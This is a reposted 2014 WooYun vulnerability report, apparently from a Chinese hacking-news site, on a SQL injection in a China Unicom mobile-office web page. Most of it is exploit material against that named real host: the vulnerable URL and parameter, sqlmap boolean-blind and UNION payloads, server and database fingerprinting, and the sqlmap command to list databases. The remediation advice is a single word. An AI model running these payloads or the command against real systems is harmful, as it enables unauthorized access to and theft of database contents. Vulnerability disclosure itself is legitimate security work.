记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国联通某沃产品SQL注入一枚

2014-05-22 02:15

这会没事逛着逛着联通的网站..就给我发现了一处注入

感动中国!

中国联通移动办公网站

注入点:http://moffice.wo.com.cn/menu_show.php?MenuID=8

---

Place: GET

Parameter: MenuID

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: MenuID=8 AND 7043=7043



Type: UNION query

Title: MySQL UNION query (NULL) - 15 columns

Payload: MenuID=-8109 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU

LL,NULL,NULL,NULL,CONCAT(0x71627a6471,0x765a6e6b6f636e744d61,0x716e636e71),NULL,

NULL,NULL#

---

[20:10:17] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.2.4, Apache 2.2.8

back-end DBMS: MySQL 5

[20:10:17] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou

tput\moffice.wo.com.cn'



sqlmap.py -u "http://moffice.wo.com.cn/menu_show.php?MenuID=8" --dbs



q1.jpg



q2.jpg



q3.jpg



看图吧

q4.jpg



漏洞证明:

见详细说明

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-055592

阅读:65327 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中国联通某沃产品SQL注入一枚”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云